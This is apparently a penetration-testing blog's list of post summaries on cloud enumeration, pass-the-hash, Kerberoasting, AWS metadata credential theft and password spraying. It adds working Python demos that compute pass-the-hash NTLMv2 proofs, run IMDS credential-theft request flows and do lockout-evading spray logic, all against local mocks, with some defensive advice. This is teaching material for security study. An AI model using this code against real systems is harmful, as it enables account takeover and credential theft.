Recent Posts

Using cloud_enum to Find S3 Buckets and More

S3, first introduced in 2006, is one of Amazon Web Services’ most popular services. This simple and fast cloud object storage solution has undoubtedly made development, file sharing, content delivery, and much more seamless for its users over the years. However, this flexibility, combined with a permission model that is easy to misconfigure (bucket policies, ACLs, and public-access settings that interact in non-obvious ways), has led to some of the biggest data breaches ever seen. With this in mind, let’s walk through why I like using cloud_enum to find S3 buckets and other goodies.

Passing the Hash for Fun and Profit

Windows is cool because the NT hashes of passwords can be used directly to authenticate to services over NTLM. That’s right, an adversary does not need to crack the hashes offline with an expensive password cracking rig; the NTLM challenge-response is computed from the hash, not the password, so they can just authenticate with the hash itself. This technique is called passing-the-hash, and we will explore a few methods you can use to perform this lateral movement technique.
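To make the “the hash is the credential” point concrete, here is an added example (not code from the original post) that builds an NTLMv2 proof from nothing but an NT hash and shows that the server, which also stores only the NT hash, accepts it. MD4 is implemented inline because hashlib’s `md4` is frequently unavailable on OpenSSL 3 builds. The usernames, domain, password and blob layout are constructed for the demo; the blob is a simplified stand-in for the real NTLMv2 “temp” structure, not a byte-exact copy of it.

```python
import hmac
import os
import struct


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often missing on OpenSSL 3."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                           # round 1, F
            f = (b & c) | (~b & d)
            a, b, c, d = d, _rotl((a + f + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                           # round 2, G
            g = (b & c) | (b & d) | (c & d)
            a, b, c, d = d, _rotl((a + g + x[r2[i]] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                           # round 3, H
            h = b ^ c ^ d
            a, b, c, d = d, _rotl((a + h + x[r3[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash as stored in the SAM / NTDS.dit: MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_response_key(nthash: bytes, user: str, domain: str) -> bytes:
    # NTOWFv2 (MS-NLMP 3.3.2): keyed by the NT hash, the password never appears again
    return hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def ntlmv2_proof(response_key: bytes, server_challenge: bytes, client_blob: bytes) -> bytes:
    # NTProofStr, the value the client sends in the AUTHENTICATE message
    return hmac.new(response_key, server_challenge + client_blob, "md5").digest()


def pass_the_hash(nthash_hex: str, user: str, domain: str,
                  server_challenge: bytes, client_blob: bytes) -> bytes:
    """Attacker side: a valid proof from the dumped hash alone, no cracking."""
    key = ntlmv2_response_key(bytes.fromhex(nthash_hex), user, domain)
    return ntlmv2_proof(key, server_challenge, client_blob)


def server_verify(stored_nthash: bytes, user: str, domain: str,
                  server_challenge: bytes, client_blob: bytes, proof: bytes) -> bool:
    """Server side: it holds only the NT hash too, so it recomputes the same proof."""
    expected = ntlmv2_proof(ntlmv2_response_key(stored_nthash, user, domain),
                            server_challenge, client_blob)
    return hmac.compare_digest(expected, proof)


def demo(dumped_hex: str = None) -> bool:
    """Constructed scenario: victim password is never given to the attacker."""
    victim_password = "Winter2023!"                 # constructed
    stored = nt_hash(victim_password)               # what the DC has on disk
    if dumped_hex is None:
        dumped_hex = stored.hex()                   # what an attacker dumps (e.g. from LSASS)
    challenge = os.urandom(8)                       # server challenge
    # simplified stand-in for the NTLMv2 temp blob: version, reserved, client nonce, padding
    blob = b"\x01\x01" + b"\x00" * 6 + os.urandom(8) + b"\x00" * 4
    proof = pass_the_hash(dumped_hex, "jdoe", "CORP", challenge, blob)
    return server_verify(stored, "jdoe", "CORP", challenge, blob, proof)


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("pass-the-hash accepted:", demo())
```

The asymmetry to notice: the client (or attacker) and the server both run exactly the same HMAC chain starting from the NT hash, so anything that can read the hash (LSASS, SAM, NTDS.dit) holds an equivalent of the password for NTLM. Kerberos is different only in which key derivation is used; for RC4-HMAC the Kerberos key is the same NT hash, which is why overpass-the-hash works too.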

I Love ScoutSuite and You Should Too

ScoutSuite is a multi-cloud security auditing tool written by the wonderful folks over at NCC Group. I use it heavily, so I wanted to do a quick guide on getting it configured and running it in your own environment. The data and reports it generates are extremely useful from both an offensive and defensive perspective, and I trust that you’ll feel the same way after using it in your own platform.

Getting Started Spraying Microsoft Services

Password spraying is the process of trying a small number of likely passwords against a large list of accounts, either externally or internally, rather than hammering one account with many guesses, so that no single account trips the lockout threshold. Adversaries use this tactic to attempt to establish initial access within an organization and/or laterally move to alternate identities within a network. The process of getting started password spraying is surprisingly easy. This is in part thanks to the prevalence of remote-work solutions that have created the need to allow users to authenticate from pretty much anywhere. Cloud services such as Office 365 actually assist the password spraying process by providing a reliable, centralized, Internet-facing authentication endpoint that can be used to attempt to breach a company’s accounts.

Farming Breached Password Data with Dehashed

Every year countless data breaches occur. From 700 million LinkedIn users’ information getting leaked sometime between 2020 and 2021, to at least 500 million Yahoo accounts’ information being breached in 2014, to the notable 2017 Equifax data breach which impacted millions of individuals, it’s safe to say that breaches are a part of the everyday news cycle in the present day. These breaches contain a wide variety of data with a variety of use cases. Social security numbers and credit card information can lead to fraud, age information and phone numbers can lead to targeted phishing attacks, and usernames and passwords can lead to… what exactly?

Attacking the AWS Metadata Service

“Since it first launched over 10 years ago, the Amazon EC2 Instance Metadata Service (IMDS) has helped customers build secure and scalable applications. The IMDS solved a big security headache for cloud users by providing access to temporary, frequently rotated credentials, removing the need to hardcode or distribute sensitive credentials to instances manually or programmatically.” However, as you may have noticed, the Metadata service possesses one unique characteristic that is useful to attackers. Along with providing information about the given instance, it also provides the temporary credentials of the instance’s IAM role, and it does so to any process on the instance that can reach 169.254.169.254 over plain HTTP, including a web application with an SSRF bug. Why does this matter?
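As an added example (not part of the original post), the exchange below shows both sides of the credential theft the paragraph describes, and the caveat a practitioner cares about: the IMDSv2 session-token requirement. A tiny in-process HTTP server stands in for 169.254.169.254 and returns constructed, fake credentials; the attacker code issues exactly the requests a real IMDS expects. Against an IMDSv2-only instance, the plain GET that most SSRF primitives can produce fails with 401, while a client able to send a PUT plus a custom header still succeeds.

```python
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed sample values; the real service returns live STS credentials here.
FAKE_ROLE = "demo-instance-role"
FAKE_CREDS = {
    "Code": "Success",
    "Type": "AWS-HMAC",
    "AccessKeyId": "ASIAEXAMPLEEXAMPLE",
    "SecretAccessKey": "fakesecret/NotARealKey",
    "Token": "fake-session-token",
    "Expiration": "2030-01-01T00:00:00Z",
}
FAKE_TOKEN = "constructed-imdsv2-session-token"
CRED_PATH = "/latest/meta-data/iam/security-credentials/"


class FakeIMDS(BaseHTTPRequestHandler):
    """Stand-in for 169.254.169.254; when require_token is set it behaves like IMDSv2-only."""
    require_token = True

    def log_message(self, *args):          # keep the demo quiet
        pass

    def _send(self, code, body=""):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def do_PUT(self):
        # IMDSv2 token request: PUT /latest/api/token with a TTL header
        if self.path == "/latest/api/token" and "X-aws-ec2-metadata-token-ttl-seconds" in self.headers:
            self._send(200, FAKE_TOKEN)
        else:
            self._send(400)

    def do_GET(self):
        if self.require_token and self.headers.get("X-aws-ec2-metadata-token") != FAKE_TOKEN:
            self._send(401)                 # what a v2-only instance does to a bare GET
            return
        if self.path == CRED_PATH:
            self._send(200, FAKE_ROLE)      # role name listing
        elif self.path == CRED_PATH + FAKE_ROLE:
            self._send(200, json.dumps(FAKE_CREDS))
        else:
            self._send(404)


def _fetch(url, method="GET", headers=None):
    req = urllib.request.Request(url, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=3) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, ""


def steal_creds_v1(base):
    """IMDSv1 style: two plain GETs, the only thing a typical SSRF bug can do."""
    status, role = _fetch(base + CRED_PATH)
    if status != 200:
        return None
    status, body = _fetch(base + CRED_PATH + role)
    return json.loads(body) if status == 200 else None


def steal_creds_v2(base):
    """IMDSv2 style: PUT for a session token, then GETs carrying the token header."""
    status, token = _fetch(base + "/latest/api/token", "PUT",
                           {"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    if status != 200:
        return None
    hdr = {"X-aws-ec2-metadata-token": token}
    status, role = _fetch(base + CRED_PATH, headers=hdr)
    if status != 200:
        return None
    status, body = _fetch(base + CRED_PATH + role, headers=hdr)
    return json.loads(body) if status == 200 else None


def run_demo(require_token=True):
    """Run both attacker flows against the fake IMDS; returns what each recovered."""
    FakeIMDS.require_token = require_token
    srv = HTTPServer(("127.0.0.1", 0), FakeIMDS)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % srv.server_port
    try:
        return {"v1": steal_creds_v1(base), "v2": steal_creds_v2(base)}
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("IMDSv2-only instance:", run_demo(True))
    print("IMDSv1-allowed instance:", run_demo(False))
```

Enforcing IMDSv2 (`HttpTokens=required`) and leaving the response hop limit at 1 is the defensive takeaway: the PUT-plus-header dance is hard to drive through a GET-only SSRF, and a hop limit of 1 keeps containers behind a NAT from reaching the service at all.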

An Introduction to Active Directory Enumeration

Active Directory is a platform that has received plenty of attention from adversaries and operators over the years. It has a rich history of exploitation methodologies, and new abuse mechanisms are regularly released by security researchers. Combine these factors with how often it is encountered within organizations, and you can quickly see why it’s a favorite target for attackers. There are a plethora of toolsets, cheatsheets, and enumeration options for Microsoft’s flagship directory service. Let’s outline a few of our favorite tools (hint: BloodHound) one can use to begin enumerating an Active Directory environment.

An Introduction to Kerberoasting

Kerberoasting is the attack that keeps on giving for adversaries and pentesters alike. First documented in 2014 by Tim Medin, Kerberoasting is a tactic that can be used after an initial compromise to gain access to alternate accounts in an Active Directory domain: any domain user can request a service ticket for an account with a Service Principal Name, and part of that ticket is encrypted with a key derived from the service account’s password, so it can be cracked offline. It has proven to be extremely potent in environments across the globe, and there’s a reason why it’s still worth talking about eight years after its initial (public) discovery. I’ll walk through an attack path that closely resembles ones I’ve used in the wild.

Harnessing the Power of LinkedIn and Talon for Password Spraying

I’ll talk through how one can use LinkedIn to gather listings of usernames and email addresses that can be combined with password spraying tactics. To demonstrate password spraying, we’ll target internal Active Directory services with the Talon toolset written by Tylous. I’ll also document some of the extra functionality I added to the tool that is now included in the main version.
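The two spraying posts above (Getting Started Spraying Microsoft Services, and this one) share the same mechanics, so here is one added example covering both; it is not code from either post and is not Talon. It turns a constructed list of names, of the kind a LinkedIn pass yields, into candidate usernames for a chosen format, then sprays one password per round across every account while pacing rounds against the lockout policy. The directory is a mock with a constructed threshold and observation window; the "naive" run shows what happens when that pacing is skipped.

```python
from dataclasses import dataclass, field

# Constructed sample: fictional employees an OSINT pass might return.
EMPLOYEES = [("Alice", "Anderson"), ("Bob", "Baker"), ("Carol", "Chen")]
DOMAIN = "example.com"                     # constructed
# Constructed, typical "season + year" style spray list.
SPRAY_PASSWORDS = ["Summer2024!", "Welcome1", "Password1", "Spring2024!", "Company123"]


def username_formats(first: str, last: str) -> dict:
    """Common corporate username conventions; pick the one a known-good address confirms."""
    f, l = first.lower(), last.lower()
    return {"first.last": f"{f}.{l}", "flast": f"{f[0]}{l}", "firstl": f"{f}{l[0]}", "first": f}


def build_targets(employees, fmt: str, domain: str) -> list:
    return [f"{username_formats(f, l)[fmt]}@{domain}" for f, l in employees]


@dataclass
class MockDirectory:
    """Constructed stand-in for the AD/M365 auth endpoint with a lockout policy."""
    passwords: dict                        # user -> real password (the thing we don't know)
    lockout_threshold: int = 5             # failures inside the window that lock the account
    observation_window: int = 30           # minutes before a failure stops counting
    failures: dict = field(default_factory=dict)
    locked: set = field(default_factory=set)

    def authenticate(self, user: str, password: str, now: int) -> str:
        if user in self.locked:
            return "locked"
        if user not in self.passwords:
            return "unknown_user"
        if self.passwords[user] == password:
            return "success"
        recent = [t for t in self.failures.get(user, []) if now - t < self.observation_window]
        recent.append(now)
        self.failures[user] = recent
        if len(recent) >= self.lockout_threshold:
            self.locked.add(user)
            return "locked"
        return "failure"


def make_directory() -> MockDirectory:
    """Fresh mock directory; Alice and Carol chose sprayable passwords, Bob did not."""
    users = build_targets(EMPLOYEES, "first.last", DOMAIN)
    return MockDirectory({users[0]: "Welcome1", users[1]: "x9#Qv!7LpZ2r", users[2]: "Summer2024!"})


def spray(directory: MockDirectory, users: list, passwords: list,
          rounds_per_window: int, observation_window: int):
    """One password per round across all users; after rounds_per_window rounds, wait out
    the observation window so no account ever accumulates threshold failures."""
    now, hits, found = 0, [], set()
    for i, pw in enumerate(passwords):
        if i and i % rounds_per_window == 0:
            now += observation_window      # stand-in for time.sleep() in a live spray
        for u in users:
            if u in found:
                continue
            if directory.authenticate(u, pw, now) == "success":
                hits.append((u, pw))
                found.add(u)
        now += 1                           # each round takes roughly a minute here
    return hits, set(directory.locked)


def safe_run():
    d = make_directory()
    # stay one failure below the threshold per window
    return spray(d, list(d.passwords), SPRAY_PASSWORDS, d.lockout_threshold - 1, d.observation_window)


def naive_run():
    d = make_directory()
    # no pacing: every password in one window
    return spray(d, list(d.passwords), SPRAY_PASSWORDS, len(SPRAY_PASSWORDS), d.observation_window)


if __name__ == "__main__":
    print("paced:", safe_run())
    print("naive:", naive_run())
```

Read the lockout policy first (`net accounts /domain` on-prem, or the Smart Lockout settings in Entra ID) and budget `rounds_per_window` from it; locking out a department is the fastest way to get a spray noticed.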